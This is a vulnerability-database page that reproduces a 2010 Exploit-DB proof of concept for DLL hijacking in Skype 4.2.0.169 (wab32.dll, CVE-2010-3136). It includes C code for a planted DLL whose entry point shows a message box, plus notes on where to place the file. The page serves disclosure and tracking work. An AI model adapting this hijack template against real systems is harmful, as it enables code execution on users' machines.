Lucene search
+L

Skype 4.2.0.169 - 'wab32.dll' DLL Hijacking

🗓️ 25 Aug 2010 00:00:00Reported by Glafkos CharalambousType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 46 Views

Skype v4.2.0.169 DLL Hijacking Exploit (wab32.dll) on Windows 7 x6

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2010-3136
25 Aug 201000:00
circl
cve
CVE
CVE-2010-3136
26 Aug 201018:00
cve
cvelist
Cvelist
CVE-2010-3136
26 Aug 201018:00
cvelist
euvd
EUVD
EUVD-2010-3136
7 Oct 202500:30
euvd
kaspersky
Kaspersky
KLA10328 ACE vulnerability in Skype
26 Aug 201000:00
kaspersky
nvd
NVD
CVE-2010-3136
26 Aug 201018:36
nvd
openvas
OpenVAS
Skype Insecure Library Loading Vulnerability - Windows
1 Sep 201000:00
openvas
openvas
OpenVAS
Skype Insecure Library Loading Vulnerability (Windows)
1 Sep 201000:00
openvas
prion
Prion
Design/Logic Flaw
26 Aug 201018:36
prion
/*
Exploit Title: Skype <= 4.2.0.169 DLL Hijacking Exploit (wab32.dll)
Date: August 25, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Version: Latest Skype v4.2.0.169
Tested on: Windows 7 x64 Ultimate
Vulnerable extensions: .skype
Greetz: Astalavista, OffSEC, Exploit-DB
Notes: Create folders %commonprogramfiles%\system and place wab32.dll
       %commonprogramfiles(x86)% on x64 bit
*/


#include <windows.h>
#define DllExport __declspec (dllexport)

BOOL WINAPI  DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
  dll_hijack();
  return 0;
}

int dll_hijack()
{
  MessageBox(0, "Skype DLL Hijacking!", "DLL Message", MB_OK);
  return 0;
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Aug 2010 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 29.3
EPSS0.06914
46